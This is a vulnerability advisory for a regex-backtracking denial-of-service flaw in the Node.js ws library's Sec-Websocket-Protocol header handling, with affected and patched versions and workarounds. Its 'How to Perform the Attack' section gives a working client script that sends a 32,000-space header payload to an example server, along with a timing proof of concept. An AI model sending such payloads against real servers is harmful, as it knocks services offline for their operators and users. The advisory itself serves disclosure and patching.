Regex backtracking Denial of Service in Sec-Websocket-Protocol Header

ReDoS in Sec-Websocket-Protocol header

Package Information

• Package: ws (npm)

• Affected versions:

  • >= 5.0.0 < 5.2.3

  • >= 6.0.0 < 6.2.2

  • >= 7.0.0 < 7.4.6

• Patched versions:

  • 5.2.3

  • 6.2.2

  • 7.4.6

Description

ws is an open-source WebSocket client and server library for Node.js. A specially crafted value of the Sec-Websocket-Protocol header can be used to significantly slow down a ws server.

Impact

A specially crafted value of the Sec-Websocket-Protocol header can be used to significantly slow down a ws server, leading to a Denial of Service (DoS).

How to Perform the Attack

Example Scenario: Example Site

Let's consider an example site using a ws WebSocket server at https://example.com/socket.

1. Navigate to the WebSocket URL:

   • wss://example.com/socket

2. Craft the malicious payload:

   • The payload will consist of a large number of spaces within the Sec-Websocket-Protocol header. This is designed to exploit regex backtracking in the ws package.

3. Example Payload:

   • "Sec-WebSocket-Protocol: b${' '.repeat(32000)}x"

4. Using the payload in a WebSocket request:

   • You can use the following JavaScript code to create a WebSocket connection with the crafted Sec-Websocket-Protocol header.

5. const WebSocket = require('ws');
   
   // Payload with a large number of spaces
   const payload = 'b' + ' '.repeat(32000) + 'x';
   
   // Options for the WebSocket connection
   const options = {
     headers: {
       'Sec-WebSocket-Protocol': payload
     }
   };
   
   // Create a WebSocket connection
   const ws = new WebSocket('wss://example.com/socket', options);
   
   ws.on('open', function open() {
     console.log('WebSocket connection opened');
   });
   
   ws.on('error', function error(err) {
     console.error('WebSocket error:', err);
   });

6. Explanation of the script:

   • The script creates a WebSocket connection to the example site with a malicious Sec-Websocket-Protocol header.

   • The payload contains a large number of spaces, which will be processed by the ws server.

7. Observe the server's response time:

   • Monitor the server's response time and resource usage. The server should exhibit significant delays or high CPU usage due to the regex backtracking issue.

Detailed Proof of Concept (PoC)

Use the following script to measure the impact of different payload lengths:

for (const length of [1000, 2000, 4000, 8000, 16000, 32000]) {
  const value = 'b' + ' '.repeat(length) + 'x';
  const start = process.hrtime.bigint();

  value.trim().split(/ *, */);

  const end = process.hrtime.bigint();

  console.log('length = %d, time = %f ns', length, end - start);
}

Patches

The vulnerability was fixed in:

• ws@7.4.6 (commit 00c425e)

• Backported to:

  • ws@6.2.2 (commit 78c676d)

  • ws@5.2.3 (commit 76d47c1)

Workarounds

In vulnerable versions of ws, the issue can be mitigated by reducing the maximum allowed length of the request headers using the --max-http-header-size=size and/or the maxHeaderSize options.